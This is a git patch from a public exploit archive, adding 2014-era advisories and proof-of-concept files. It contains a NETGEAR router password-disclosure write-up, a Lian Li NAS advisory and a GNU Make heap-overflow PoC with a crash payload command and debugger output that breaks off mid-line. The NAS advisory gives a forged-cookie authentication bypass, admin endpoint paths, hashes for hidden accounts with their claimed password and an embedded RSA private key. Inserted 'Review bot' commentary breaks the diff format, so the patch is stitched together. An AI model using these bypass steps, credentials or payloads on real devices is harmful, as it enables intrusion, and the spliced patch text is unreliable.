From 0cca3dcc6f9e046b80c4122a0e0584fddbccad4f Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 26 Jul 2014 04:37:24 +0000 Subject: [PATCH] Updated 07_26_2014 --- files.csv | 17 +- platforms/hardware/webapps/34149.txt | 827 +++++++++++++++++++++++++++ platforms/hardware/webapps/34163.txt | 327 +++++++++++ platforms/linux/dos/34164.pl | 182 ++++++ platforms/multiple/webapps/34165.txt | 92 +++ platforms/php/remote/34160.txt | 293 ++++++++++ platforms/php/webapps/34157.txt | 11 + platforms/php/webapps/34159.txt | 10 + platforms/php/webapps/34161.txt | 98 ++++ platforms/windows/dos/34151.txt | 9 + platforms/windows/dos/34158.txt | 9 + platforms/windows/dos/34162.py | 55 ++ 12 files changed, 1927 insertions(+), 3 deletions(-) create mode 100755 platforms/hardware/webapps/34149.txt create mode 100755 platforms/hardware/webapps/34163.txt create mode 100755 platforms/linux/dos/34164.pl create mode 100755 platforms/multiple/webapps/34165.txt create mode 100755 platforms/php/remote/34160.txt create mode 100755 platforms/php/webapps/34157.txt create mode 100755 platforms/php/webapps/34159.txt create mode 100755 platforms/php/webapps/34161.txt create mode 100755 platforms/windows/dos/34151.txt create mode 100755 platforms/windows/dos/34158.txt create mode 100755 platforms/windows/dos/34162.py diff --git a/files.csv b/files.csv index 3b5b27292..e1a102d7f 100755 --- a/files.csv +++ b/files.csv 
@@ -17504,7 +17504,7 @@ id,file,description,date,author,platform,type,port
 20201,platforms/linux/local/20201.c,"Nvidia Linux Driver Privilege Escalation",2012-08-02,anonymous,linux,local,0
 20202,platforms/windows/remote/20202.rb,"Cisco Linksys PlayerPT ActiveX Control SetSource sURL argument Buffer Overflow",2012-08-03,metasploit,windows,remote,0
 20204,platforms/windows/remote/20204.rb,"Dell SonicWALL Scrutinizer 9 SQL Injection",2012-08-03,metasploit,windows,remote,0
-20205,platforms/unix/remote/20205.rb,"Zenoss 3 showDaemonXMLConfig Command Execution",2012-08-03,metasploit,unix,remote,8080
+20205,platforms/unix/remote/20205.rb,"Zenoss 3 - showDaemonXMLConfig Command Execution",2012-08-03,metasploit,unix,remote,8080
 20206,platforms/multiple/remote/20206.txt,"QSSL Voyager 2.0 1B Arbitrary File Access",2000-09-01,neonbunny,multiple,remote,0
 20207,platforms/multiple/remote/20207.txt,"QSSL Voyager 2.0 1B .photon Directory Information Disclosure",2000-09-01,neonbunny,multiple,remote,0
 20208,platforms/php/webapps/20208.txt,"nathan purciful phpphotoalbum 0.9.9 - Directory Traversal vulnerability",2000-09-07,pestilence,php,webapps,0
@@ -30190,7 +30190,7 @@ id,file,description,date,author,platform,type,port
 33508,platforms/linux/local/33508.txt,"GNU Bash <= 4.0 'ls' Control Character Command Injection Vulnerability",2010-01-13,"Eric Piel",linux,local,0
 33509,platforms/php/webapps/33509.txt,"Joomla! 'com_tienda' Component 'categoria' Parameter Cross-Site Scripting Vulnerability",2010-01-13,FL0RiX,php,webapps,0
 33510,platforms/php/webapps/33510.txt,"Tribisur 'cat' Parameter Cross Site Scripting Vulnerability",2010-01-13,"ViRuSMaN ",php,webapps,0
-33511,platforms/multiple/webapps/33511.txt,"Zenoss 2.3.3 Multiple SQL Injection Vulnerabilities",2010-01-14,"nGenuity Information Services",multiple,webapps,0
+33511,platforms/multiple/webapps/33511.txt,"Zenoss 2.3.3 - Multiple SQL Injection Vulnerabilities",2010-01-14,"nGenuity Information Services",multiple,webapps,0
 33514,platforms/php/webapps/33514.txt,"Videos Tube 1.0 - Multiple SQL Injection Vulnerabilities",2014-05-26,"Mustafa ALTINKAYNAK",php,webapps,80
 33516,platforms/linux/local/33516.txt,"Linux kernel 3.14-rc1 <= 3.15-rc4 - Raw Mode PTY Local Echo Race Condition (x64) Local Privilege Escalation",2014-05-26,"Matthew Daley",linux,local,0
 33518,platforms/hardware/webapps/33518.txt,"Zyxel P-660HW-T1 v3 Wireless Router - CSRF Vulnerability",2014-05-26,"Mustafa ALTINKAYNAK",hardware,webapps,80
@@ -30209,7 +30209,7 @@ id,file,description,date,author,platform,type,port
 33533,platforms/windows/dos/33533.html,"Gracenote CDDBControl ActiveX Control 'ViewProfile' Method Heap Buffer Overflow Vulnerability",2010-01-18,karak0rsan,windows,dos,0
 33534,platforms/php/webapps/33534.txt,"TestLink <= 1.8.5 'order_by_login_dir' Parameter Cross Site Scripting Vulnerability",2010-01-18,"Prashant Khandelwal",php,webapps,0
 33535,platforms/linux/remote/33535.txt,"SystemTap 1.0 'stat-server' Remote Arbitrary Command Injection Vulnerability",2010-01-15,"Frank Ch. Eigler",linux,remote,0
-33536,platforms/multiple/remote/33536.txt,"Zenoss 2.3.3 Multiple Cross Site Request Forgery Vulnerabilities",2010-01-18,"Adam Baldwin",multiple,remote,0
+33536,platforms/multiple/remote/33536.txt,"Zenoss 2.3.3 - Multiple Cross Site Request Forgery Vulnerabilities",2010-01-18,"Adam Baldwin",multiple,remote,0
 33538,platforms/windows/remote/33538.py,"Easy File Sharing FTP Server 3.5 - Stack Buffer Overflow",2014-05-27,superkojiman,windows,remote,21
 33540,platforms/windows/remote/33540.txt,"SurgeFTP 2.x 'surgeftpmgr.cgi' Multiple Cross Site Scripting Vulnerabilities",2010-01-18,indoushka,windows,remote,0
 33541,platforms/php/webapps/33541.txt,"DataLife Engine 8.3 engine/inc/include/init.php selected_language Parameter Remote File Inclusion",2010-01-19,indoushka,php,webapps,0
@@ -30756,8 +30756,19 @@ id,file,description,date,author,platform,type,port
 34146,platforms/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login Multiple SQL Injection Vulnerabilities",2010-06-15,"L0rd CrusAd3r",php,webapps,0
 34147,platforms/php/webapps/34147.txt,"JForum 2.1.8 'username' Parameter Cross Site Scripting Vulnerability",2010-06-06,"Adam Baldwin",php,webapps,0
 34148,platforms/multiple/webapps/34148.TXT,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Vulnerability",2014-07-23,Vulnerability-Lab,multiple,webapps,0
+34149,platforms/hardware/webapps/34149.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure vulnerability",2014-07-23,"Dolev Farhi",hardware,webapps,0
+34151,platforms/windows/dos/34151.txt,"Adobe SVG Viewer 3.0 - Circle Transform Remote Code Execution Vulnerability",2010-06-16,h07,windows,dos,0
 34152,platforms/linux/remote/34152.txt,"CUPS <= 1.4.2 Web Interface Information Disclosure Vulnerability",2010-06-15,"Luca Carettoni",linux,remote,0
 34153,platforms/php/webapps/34153.txt,"2daybiz Network Community Script SQL Injection and Cross Site Scripting Vulnerabilities",2010-06-16,Sid3^effects,php,webapps,0
 34154,platforms/php/webapps/34154.txt,"Software Index 'signinform.php' Cross-Site Scripting Vulnerability",2010-06-27,indoushka,php,webapps,0
 34155,platforms/php/webapps/34155.txt,"Ceica-GW 'login.php' Cross Site Scripting Vulnerability",2010-06-27,indoushka,php,webapps,0
 34156,platforms/windows/remote/34156.pl,"TurboFTP Server <= 1.20.745 Directory Traversal Vulnerability",2010-06-17,leinakesi,windows,remote,0
+34157,platforms/php/webapps/34157.txt,"Firebook Multiple Cross Site Scripting and Directory Traversal Vulnerabilities",2010-06-17,MustLive,php,webapps,0
+34158,platforms/windows/dos/34158.txt,"Chrome Engine 4 - Denial Of Service Vulnerability",2010-06-17,"Luigi Auriemma",windows,dos,0
+34159,platforms/php/webapps/34159.txt,"Gallery XML Joomla! 
Component 1.1 SQL Injection and Local File Include Vulnerabilities",2010-06-18,jdc,php,webapps,0 +34160,platforms/php/remote/34160.txt,"Omeka 2.2.1 - Remote Code Execution Exploit",2014-07-24,LiquidWorm,php,remote,80 +34161,platforms/php/webapps/34161.txt,"Wordpress Video Gallery Plugin 2.5 - Multiple Vulnerabilities",2014-07-24,"Claudio Viviani",php,webapps,80 +34162,platforms/windows/dos/34162.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH)",2014-07-24,"Gabor Seljan",windows,dos,0 +34163,platforms/hardware/webapps/34163.txt,"Lian Li NAS - Multiple Vulnerabilities",2014-07-24,pws,hardware,webapps,0 +34164,platforms/linux/dos/34164.pl,"Make 3.81 - Heap Overflow PoC",2014-07-24,HyP,linux,dos,0 +34165,platforms/multiple/webapps/34165.txt,"Zenoss Monitoring System 4.2.5-2108 64bit - Stored XSS",2014-07-25,"Dolev Farhi",multiple,webapps,0 diff --git a/platforms/hardware/webapps/34149.txt b/platforms/hardware/webapps/34149.txt new file mode 100755 index 000000000..81df78f7b --- /dev/null +++ b/platforms/hardware/webapps/34149.txt @@ -0,0 +1,827 @@ +# Exploit Title: Password Disclosure vulnerability +# Software: NETGEAR DGN2200 +# Software Link: netgear.com +# Version: DGN2200 +# Author: Dolev Farhi, email: dolev(at)openflare(dot)org +# Date: 23.7.2014 +# Tested on: Kali Linux +# Firmware 1.0.0.29_1.7.29_HotS + + +2. Vulnerability Description: +=============================== +An attacker is able to extract sensitive information such as the password from the Basic Settings router page due to storing it in plaintext. + + +3. Steps to reproduce: +====================== +Navigate to the Basic Settings page, right click in the browser -> view source/frame + +html> + + + + + + + + +PPPoE + + + + + + + + + + + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +

Basic Settings

+ +
+

Does Your Internet Connection Require A Login?

+ Yes
+ No
Encapsulation
Login
Password
Service Name (If Required)
Idle Timeout (In Minutes)
Internet IP Address
Get Dynamically From ISP
Use Static IP Address + . + . + . +
Domain Name Server (DNS) Address
Get Automatically From ISP
Use These DNS Servers
Primary DNS + . + . + . +
Secondary DNS + . + . + . +
NAT (Network Address Translation)
+ Enable + Disable + Bridge +
+ + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+

+ + + + diff --git a/platforms/hardware/webapps/34163.txt b/platforms/hardware/webapps/34163.txt new file mode 100755 index 000000000..e3650cbf2 --- /dev/null +++ b/platforms/hardware/webapps/34163.txt 
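Review bot: The vulnerability description never states what privilege is needed to reach the Basic Settings page, so the severity cannot be judged from the advisory — that page is presumably part of the authenticated administration UI, in which case this is disclosure of the stored ISP/PPPoE credential to whoever already holds an admin session (or to a CSRF/shoulder-surfing chain), not an unauthenticated leak, and a header line such as `# Precondition: authenticated access to the router web UI (Basic Settings page)` should say so. The reproduction step "view source" only proves the point if the password `<input>` carries the secret in its `value` attribute, but the markup as reproduced in this listing has been reduced to the field labels (`Login`, `Password`), so the one line that substantiates the claim is not visible; an HTML-escaped excerpt of that single `<input>` line in section 3 would be far more useful than the whole page dump. The remediation is the standard one and is worth stating: never echo a stored secret back into a form value, render a placeholder and only accept the field when the user changes it.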
@@ -0,0 +1,327 @@ +# Exploit Title: Lian Li NAS Multiple vulnerabilities +# Date: 21/07/2014 +# Exploit Author: pws +# Vendor Homepage: http://www.lian-li.com/en/dt_portfolio_category/nas/ +# Firmware Link: https://www.dropbox.com/s/imvkndl8m5yj7qp/G5S604121826700.tar.gz +# Tested on: Latest version +# CVE : None yet + +1. Hardcoded cookie to access the admin section + +File: /javascript/storlib.js +function get_cookie() +{ + var allcookies = document.cookie; + var pos = allcookies.indexOf("LoginUser=admin"); + if (pos == -1) + location = "/index.html"; +} + +2. Authentication bypass + +Create such cookie: 'LoginUser=admin' (document.cookie='LoginUser=admin'). +Then, access the URL directly to get admin features. + +Eg. +http://192.168.1.1/cgi/telnet/telnet.cgi # enable/disable the Telnet server +http://192.168.1.1/cgi/user/user.cgi # manage users (change passwords, add user, ...) + +Here are all the cgi's accessible (firmware: G5S604121826700) : + +cgi/lan/lan.cgi +cgi/lan/lan_nasHandler.cgi +cgi/lan/lan_routerHandler.cgi +cgi/information/information.cgi +cgi/return/return.cgi +cgi/account/account.cgi +cgi/account/accountHandler.cgi +cgi/lang/lang.cgi +cgi/lang/langHandler.cgi +cgi/backup/clear.cgi +cgi/backup/fixed.cgi +cgi/backup/ipaddress.cgi +cgi/backup/listing.cgi +cgi/backup/s.cgi +cgi/backup/schedule.cgi +cgi/backup/source.cgi +cgi/backup/dd_schedule.cgi +cgi/backup/decide.cgi +cgi/backup/ipaddress1.cgi +cgi/backup/s1.cgi +cgi/backup/source1.cgi +cgi/backup/ipaddress2.cgi +cgi/backup/s2.cgi +cgi/backup/source2.cgi +cgi/backup/ipaddress3.cgi +cgi/backup/s3.cgi +cgi/backup/source3.cgi +cgi/backup/ipaddress5.cgi +cgi/backup/s5.cgi +cgi/backup/source5.cgi +cgi/backup/l.cgi +cgi/backup/listing1.cgi +cgi/backup/listing2.cgi +cgi/backup/listing3.cgi +cgi/backup/listing5.cgi +cgi/backup/email.cgi +cgi/backup/email1.cgi +cgi/backup/fixed1.cgi +cgi/backup/schedule1.cgi +cgi/backup/email2.cgi +cgi/backup/fixed2.cgi +cgi/backup/schedule2.cgi +cgi/backup/email3.cgi 
+cgi/backup/fixed3.cgi +cgi/backup/schedule3.cgi +cgi/backup/dd_schedule1.cgi +cgi/backup/dd_schedule2.cgi +cgi/backup/dd_schedule3.cgi +cgi/backup/dd_schedule5.cgi +cgi/backup/email5.cgi +cgi/backup/fixed5.cgi +cgi/backup/schedule5.cgi +cgi/backup/fixed6.cgi +cgi/backup/ipaddress6.cgi +cgi/backup/listing6.cgi +cgi/backup/s6.cgi +cgi/backup/email6.cgi +cgi/backup/schedule6.cgi +cgi/backup/source6.cgi +cgi/backup/dd_schedule6.cgi +cgi/backup/fixed4.cgi +cgi/backup/ipaddress4.cgi +cgi/backup/listing4.cgi +cgi/backup/s4.cgi +cgi/backup/email4.cgi +cgi/backup/schedule4.cgi +cgi/backup/source4.cgi +cgi/backup/dd_schedule4.cgi +cgi/backup/emessage.cgi +cgi/backup/emessage_fail.cgi +cgi/group/group.cgi +cgi/group/groupHandler.cgi +cgi/group/groupDeleteHandler.cgi +cgi/group/groupMembers.cgi +cgi/group/groupMembersHandler.cgi +cgi/user/user.cgi +cgi/user/userHandler.cgi +cgi/user/userDeleteHandler.cgi +cgi/user/userMembership.cgi +cgi/user/userMembershipHandler.cgi +cgi/time/time.cgi +cgi/time/timeHandler.cgi +cgi/power/power.cgi +cgi/power/powerHandler.cgi +cgi/factoryReset/factoryReset.cgi +cgi/factoryReset/factoryResetHandler.cgi +cgi/restoreConfig/restoreConfig.cgi +cgi/restoreConfig/restoreConfigHandler.cgi +cgi/saveConfig/saveConfig.cgi +cgi/saveConfig/saveConfigHandler.cgi +cgi/diskUsage/diskUsage.cgi +cgi/diskUsage/diskUsageuser.cgi +cgi/diskUsage/diskUsageHandler.cgi +cgi/diskUsage/diskUsageuserHandler.cgi +cgi/diskUtility/diskUtility.cgi +cgi/diskUtility/diskUtilityHandler.cgi +cgi/diskUtility/healthReport.cgi +cgi/dhcpserver/dhcpserver.cgi +cgi/dhcpserver/dhcpserverHandler.cgi +cgi/dhcpserver/dhcplease.cgi +cgi/dhcpserver/dhcpleaseHandler.cgi +cgi/dhcpserver/dhcpstatic.cgi +cgi/dhcpserver/dhcpstaticHandler.cgi +cgi/dhcpserver/staticipDeleteHandler.cgi +cgi/errorAlert/errorAlert.cgi +cgi/errorAlert/errorAlertHandler.cgi +cgi/share/share.cgi +cgi/share/shareHandler.cgi +cgi/share/shareDeleteHandler.cgi +cgi/share/share_nonLinux.cgi 
+cgi/share/share_nonLinuxHandler.cgi +cgi/share/share_Linux.cgi +cgi/share/share_LinuxHandler.cgi +cgi/fileServer/fileServer.cgi +cgi/fileServer/fileServerHandler.cgi +cgi/log_system/log_system.cgi +cgi/log_system/log_systemHandler.cgi +cgi/log_admin/log_admin.cgi +cgi/log_admin/log_adminHandler.cgi +cgi/log_dhcp/log_dhcp.cgi +cgi/log_dhcp/log_dhcpHandler.cgi +cgi/log_ftp/log_ftp.cgi +cgi/log_ftp/log_ftpHandler.cgi +cgi/log_samba/log_samba.cgi +cgi/log_samba/log_sambaHandler.cgi +cgi/printer/printer.cgi +cgi/printer/printerHandler.cgi +cgi/upgrade2/upgrade.cgi +cgi/upgrade2/upgradeHandler.cgi +cgi/wizard/wizard.cgi +cgi/wizard/language.cgi +cgi/wizard/languageHandler.cgi +cgi/wizard/password.cgi +cgi/wizard/passwordHandler.cgi +cgi/wizard/hostname.cgi +cgi/wizard/hostnameHandler.cgi +cgi/wizard/tcpip.cgi +cgi/wizard/tcpipHandler.cgi +cgi/wizard/time.cgi +cgi/wizard/timeHandler.cgi +cgi/wizard/confirm.cgi +cgi/wizard/confirmHandler.cgi +cgi/wizard/addUser.cgi +cgi/wizard/user.cgi +cgi/wizard/userHandler.cgi +cgi/wizard/userMembership.cgi +cgi/wizard/userMembershipHandler.cgi +cgi/wizard/userSharePermission.cgi +cgi/wizard/userSharePermissionHandler.cgi +cgi/wizard/addGroup.cgi +cgi/wizard/group.cgi +cgi/wizard/groupHandler.cgi +cgi/wizard/groupMembers.cgi +cgi/wizard/groupMembersHandler.cgi +cgi/wizard/groupSharePermission.cgi +cgi/wizard/groupSharePermissionHandler.cgi +cgi/wizard/addShare.cgi +cgi/wizard/share.cgi +cgi/wizard/shareHandler.cgi +cgi/wizard/sharePermission.cgi +cgi/wizard/sharePermissionHandler.cgi +cgi/wizard/nfsPermission.cgi +cgi/wizard/nfsPermissionHandler.cgi +cgi/wizard/button.cgi +cgi/telnet/telnet.cgi +cgi/telnet/telnetHandler.cgi +cgi/bonjour/bonjour.cgi +cgi/bonjour/bonjourHandler.cgi +cgi/raid/raid.cgi +cgi/raid/raidHandler.cgi +cgi/swupdate/swupdate.cgi +cgi/swupdate/swupdateHandler.cgi +cgi/swupdate/installHandler.cgi +cgi/swupdate/swlist.cgi +cgi/swupdate/swlistHandler.cgi + +All forms on those cgi pages can be used to perform CSRF 
attacks (to target internal network for example). + +3. Backdoored accounts + +Some users are not referenced in the management page but are present in the system. +Moreover, the robustness of such passwords is really poor (password = "123456"): + +mysql:$1$$RmyPVMlhpXjJj8iv4w.Ul.:6000:6000:Linux User,,,:/home/mysql:/bin/sh +daemon:$1$$RmyPVMlhpXjJj8iv4w.Ul.:7000:7000:Linux User,,,:/home/daemon:/bin/sh + +4. Privilege escalation "scenario" + +Enable Telnet server (if disabled) +Connect to it using one of the backdoored accounts and retrieve /etc/passwd file. +It contains passwords for all accounts. + +5. Certificate used by the FTP server stored in the firmware + +cacert.pem + +subject=/C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=SSLeay demo server +issuer= /C=AU/SOP=QLD/O=Mincom Pty. Ltd./OU=CS/CN=CA +-----BEGIN X509 CERTIFICATE----- + +MIIBgjCCASwCAQQwDQYJKoZIhvcNAQEEBQAwODELMAkGA1UEBhMCQVUxDDAKBgNV +BAgTA1FMRDEbMBkGA1UEAxMSU1NMZWF5L3JzYSB0ZXN0IENBMB4XDTk1MTAwOTIz +MzIwNVoXDTk4MDcwNTIzMzIwNVowYDELMAkGA1UEBhMCQVUxDDAKBgNVBAgTA1FM +RDEZMBcGA1UEChMQTWluY29tIFB0eS4gTHRkLjELMAkGA1UECxMCQ1MxGzAZBgNV +BAMTElNTTGVheSBkZW1vIHNlcnZlcjBcMA0GCSqGSIb3DQEBAQUAA0sAMEgCQQC3 +LCXcScWua0PFLkHBLm2VejqpA1F4RQ8q0VjRiPafjx/Z/aWH3ipdMVvuJGa/wFXb +/nDFLDlfWp+oCPwhBtVPAgMBAAEwDQYJKoZIhvcNAQEEBQADQQArNFsihWIjBzb0 +DCsU0BvL2bvSwJrPEqFlkDq3F4M6EGutL9axEcANWgbbEdAvNJD1dmEmoWny27Pn +IMs6ZOZB +-----END X509 CERTIFICATE----- + +server-cert.pem + +Certificate: + Data: + Version: 3 (0x2) + Serial Number: 1 (0x1) + Signature Algorithm: sha1WithRSAEncryption + Issuer: C=TW, ST=Taipei, O=Storm, OU=software, CN=aaron/emailAddress=aaron@storlinksemi.com + Validity + Not Before: Jan 3 00:46:50 2007 GMT + Not After : Jan 3 00:46:50 2008 GMT + Subject: C=TW, ST=Taipei, L=Hsinchu, O=Storm, OU=software, CN=aaron/emailAddress=aaron@storlinksemi.com + Subject Public Key Info: + Public Key Algorithm: rsaEncryption + RSA Public Key: (1024 bit) + Modulus (1024 bit): + 00:c4:1d:89:dc:9b:45:6c:96:e2:ad:e6:98:13:25: + 
64:b4:54:f6:e4:97:74:d5:9f:15:1e:1d:45:a1:75: + 45:fc:3b:2b:9c:dd:e6:0d:34:4b:d7:6c:8d:d0:32: + 5f:39:25:ab:53:81:de:84:17:cf:27:0a:c2:26:82: + 9f:09:3f:a8:7e:8c:31:c3:fe:43:75:fe:1f:53:8e: + 74:0e:31:d2:55:71:51:1b:7a:01:e3:57:4f:f7:d6: + 9f:1d:39:19:42:3c:a1:bd:08:d1:99:69:fc:1c:34: + 6e:0f:fb:a7:36:f5:77:bf:95:c8:1d:50:30:25:59: + 23:39:d3:27:5a:06:0a:05:6d + Exponent: 65537 (0x10001) + X509v3 extensions: + X509v3 Basic Constraints: + CA:FALSE + Netscape Comment: + OpenSSL Generated Certificate + X509v3 Subject Key Identifier: + 61:19:1F:04:38:83:83:E0:CD:6A:8C:CA:F9:9C:6E:D3:7F:C5:55:C3 + X509v3 Authority Key Identifier: + keyid:F6:E9:49:A1:24:01:C1:0A:4C:7F:6A:E7:58:B8:95:BC:AF:95:B4:F7 + DirName:/C=TW/ST=Taipei/O=Storm/OU=software/CN=aaron/emailAddress=aaron@storlinksemi.com + serial:00 + + Signature Algorithm: sha1WithRSAEncryption + 5b:b7:dc:28:58:5e:53:c5:d7:88:be:71:21:43:b5:db:a1:d7: + fc:de:38:1d:38:e7:b3:a4:a5:64:92:1b:67:1b:c8:3e:0f:a9: + 16:77:0c:0b:bf:e9:d2:b5:70:cd:05:71:df:1a:db:2a:c8:56: + 5d:91:1c:ef:2b:16:b3:f0:55:89:ba:35:e4:ae:07:6c:4a:c5: + d0:0d:e3:1b:1d:5e:fd:01:b2:52:0e:fe:05:08:ed:40:26:e6: + b0:2b:24:2f:0d:42:11:f0:d9:b4:6d:db:ce:d1:b1:65:77:62: + 7a:06:8b:09:c7:33:f3:43:13:a7:33:47:af:5c:6a:39:4e:8f: + 64:5c +-----BEGIN CERTIFICATE----- +MIIDezCCAuSgAwIBAgIBATANBgkqhkiG9w0BAQUFADB4MQswCQYDVQQGEwJUVzEP +MA0GA1UECBMGVGFpcGVpMQ4wDAYDVQQKEwVTdG9ybTERMA8GA1UECxMIc29mdHdh +cmUxDjAMBgNVBAMTBWFhcm9uMSUwIwYJKoZIhvcNAQkBFhZhYXJvbkBzdG9ybGlu +a3NlbWkuY29tMB4XDTA3MDEwMzAwNDY1MFoXDTA4MDEwMzAwNDY1MFowgYoxCzAJ +BgNVBAYTAlRXMQ8wDQYDVQQIEwZUYWlwZWkxEDAOBgNVBAcTB0hzaW5jaHUxDjAM +BgNVBAoTBVN0b3JtMREwDwYDVQQLEwhzb2Z0d2FyZTEOMAwGA1UEAxMFYWFyb24x +JTAjBgkqhkiG9w0BCQEWFmFhcm9uQHN0b3JsaW5rc2VtaS5jb20wgZ8wDQYJKoZI +hvcNAQEBBQADgY0AMIGJAoGBAMQdidybRWyW4q3mmBMlZLRU9uSXdNWfFR4dRaF1 +Rfw7K5zd5g00S9dsjdAyXzklq1OB3oQXzycKwiaCnwk/qH6MMcP+Q3X+H1OOdA4x +0lVxURt6AeNXT/fWnx05GUI8ob0I0Zlp/Bw0bg/7pzb1d7+VyB1QMCVZIznTJ1oG 
+CgVtAgMBAAGjggEAMIH9MAkGA1UdEwQCMAAwLAYJYIZIAYb4QgENBB8WHU9wZW5T +U0wgR2VuZXJhdGVkIENlcnRpZmljYXRlMB0GA1UdDgQWBBRhGR8EOIOD4M1qjMr5 +nG7Tf8VVwzCBogYDVR0jBIGaMIGXgBT26UmhJAHBCkx/audYuJW8r5W096F8pHow +eDELMAkGA1UEBhMCVFcxDzANBgNVBAgTBlRhaXBlaTEOMAwGA1UEChMFU3Rvcm0x +ETAPBgNVBAsTCHNvZnR3YXJlMQ4wDAYDVQQDEwVhYXJvbjElMCMGCSqGSIb3DQEJ +ARYWYWFyb25Ac3RvcmxpbmtzZW1pLmNvbYIBADANBgkqhkiG9w0BAQUFAAOBgQBb +t9woWF5TxdeIvnEhQ7Xbodf83jgdOOezpKVkkhtnG8g+D6kWdwwLv+nStXDNBXHf +GtsqyFZdkRzvKxaz8FWJujXkrgdsSsXQDeMbHV79AbJSDv4FCO1AJuawKyQvDUIR +8Nm0bdvO0bFld2J6BosJxzPzQxOnM0evXGo5To9kXA== +-----END CERTIFICATE----- + +server-key.pem + +-----BEGIN RSA PRIVATE KEY----- +MIICXQIBAAKBgQDEHYncm0VsluKt5pgTJWS0VPbkl3TVnxUeHUWhdUX8Oyuc3eYN +NEvXbI3QMl85JatTgd6EF88nCsImgp8JP6h+jDHD/kN1/h9TjnQOMdJVcVEbegHj +V0/31p8dORlCPKG9CNGZafwcNG4P+6c29Xe/lcgdUDAlWSM50ydaBgoFbQIDAQAB +AoGBAIKcZZd99aOXbcqBm+CMc+BCAdhGInKvK0JOHnSkhQKyaZ5kjnVW0ffb/Sqe +kZqewtav1IFG1hjbamh5b++Z7N2F+jshPnacdBXrgT4PPUfj3+ZirXlyckxJv3YT +Ql1bLsaCMne2b4sUuGsldROfiXfOR5SDUhbHocQj+mj8C/OlAkEA/4TfMZJqIkAx +W7uwPqX7c6k1XhLwC5tjEkyZA3jhgLMCDzw1RGxO65haVyKm//e4f1S7ctQ/v80j +Rret0A4cnwJBAMR8CqOpKI7W4Qao2aIYmL36a9VIFWoNunlmuSUW/KiBkAGhfGBn ++VG0uueM4PdOWl0i45SyZxTiYUjxE+BSlnMCQQDp611dB3osYvIM1dVydQevCgA2 +YEXrilR3YzJNkHN5G+fNxMPLIRBa9H33+VxDRyhbQVndtNurnoQl8G+p4dFnAkA5 +Ftl4iBPyvNiROMpTYNYwjOx8Af/G2spNr90nu7AZvdt7vdIHqO42IU8VLEfJU4jJ ++vMpJ1TwKn6d1P4zdYulAkB1FPvPcRmn1P69b2tDGEeoSNbh4s7eqV7AntDGeQhp +ppiLtY+nlj+Mjs2pHLa1bRAWcQRl/GYU4rdF6Py9F/w/ +-----END RSA PRIVATE KEY----- diff --git a/platforms/linux/dos/34164.pl b/platforms/linux/dos/34164.pl new file mode 100755 index 000000000..946e632b5 --- /dev/null +++ b/platforms/linux/dos/34164.pl 
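Review bot: Section 2 derives an "authentication bypass" from `get_cookie()` in storlib.js, but that function is a client-side redirect and proves nothing about the server: the finding depends on whether the `/cgi/...` handlers validate any session at all, and the advisory should state which case it is — if `telnetHandler.cgi` answers with no Cookie header, the `LoginUser=admin` step is cosmetic and the real bug is "CGI endpoints perform no server-side authentication"; if the cookie is checked server-side, it is a static, forgeable session token. One sentence such as `Requests to /cgi/telnet/telnetHandler.cgi succeed with no Cookie header at all` (or its opposite) settles it and also decides whether the CSRF remark at the end of the list is a separate issue. Section 5 prints `server-key.pem` but does not spell out the consequence: a private key embedded in the firmware image is identical on every unit, so anyone with the image can impersonate the FTPS service on any device or decrypt RSA-key-exchange sessions, and both certificates shown are long expired (the CA cert in 1998, the server cert in January 2008). The "backdoored accounts" in section 3 are md5crypt hashes with an empty salt (`$1$$...`); the claim that they equal `123456` is asserted but not demonstrated, so a crack output or a login transcript would back it.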
@@ -0,0 +1,182 @@ +=for comment +# Exploit Title: MAKE Heap Overflow - Pointer dereferencing POC (Calloc)-X86 X64 +# Date: [14.07.14] +# Exploit Author: HyP +# Vendor Homepage: http://www.gnu.org/software/make/ +# Software Link: http://ftp.gnu.org/gnu/make/ +# Version: Make 3.81 +# Tested on: linux32,64 bits (Fedora,Debian,ubuntu,Arch) +# CVE : none + +******************************************************************************************* +Special Thanks: + +kmkz +Zadyree +Sec0d Team + +******************************************************************************************* +******************************************************************************************* +32bits + + +./checksec.sh --file make +RELRO STACK CANARY NX PIE RPATH +RUNPATH FILE +No RELRO No canary found NX enabled No PIE No RPATH +No RUNPATH make + + +gdb-peda$ r `perl -e 'print "A" x 4000 . "B"x96 . "\xef\xbe\xad\xde"x4'` + + +Program received signal SIGSEGV, Segmentation fault. +[----------------------------------registers-----------------------------------] +... 
+EAX: 0xdeadbeef +EBX: 0x807b971 --> 0x6f2e ('.o') +ECX: 0x0 +EDX: 0x1 +ESI: 0xdeadbeef +EDI: 0x0 +EBP: 0xbfffc5e8 --> 0xbfffc698 --> 0x8081de0 --> 0x0 +ESP: 0xbfffa310 --> 0xbfffb510 --> 0x6f2e ('.o') +EIP: 0x80548b2 (mov eax,DWORD PTR [eax]) +EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction +overflow) +[-------------------------------------code-------------------------------------] +0x80548aa: je 0x80548b8 +0x80548ac: lea esi,[esi+eiz*1+0x0] +0x80548b0: mov esi,eax +=> 0x80548b2: mov eax,DWORD PTR [eax] <------ Pointer Dereferencing +0x80548b4: test eax,eax +0x80548b6: jne 0x80548b0 +0x80548b8: cmp DWORD PTR [ebp-0x1034],0x1 +0x80548bf: mov DWORD PTR [ebp-0x10ac],edx +[------------------------------------stack-------------------------------------] +0000| 0xbfffa310 --> 0xbfffb510 --> 0x6f2e ('.o') +0004| 0xbfffa314 --> 0x807b971 --> 0x6f2e ('.o') +0008| 0xbfffa318 --> 0x2 +0012| 0xbfffa31c --> 0xb7ffadf8 ("symbol=%s; lookup in file=%s [%lu]\n") +0016| 0xbfffa320 --> 0x0 +0020| 0xbfffa324 --> 0x0 +0024| 0xbfffa328 --> 0x0 +0028| 0xbfffa32c --> 0x0 +[------------------------------------------------------------------------------] +Legend: code, data, rodata, value +Stopped reason: SIGSEGV +0x080548b2 in 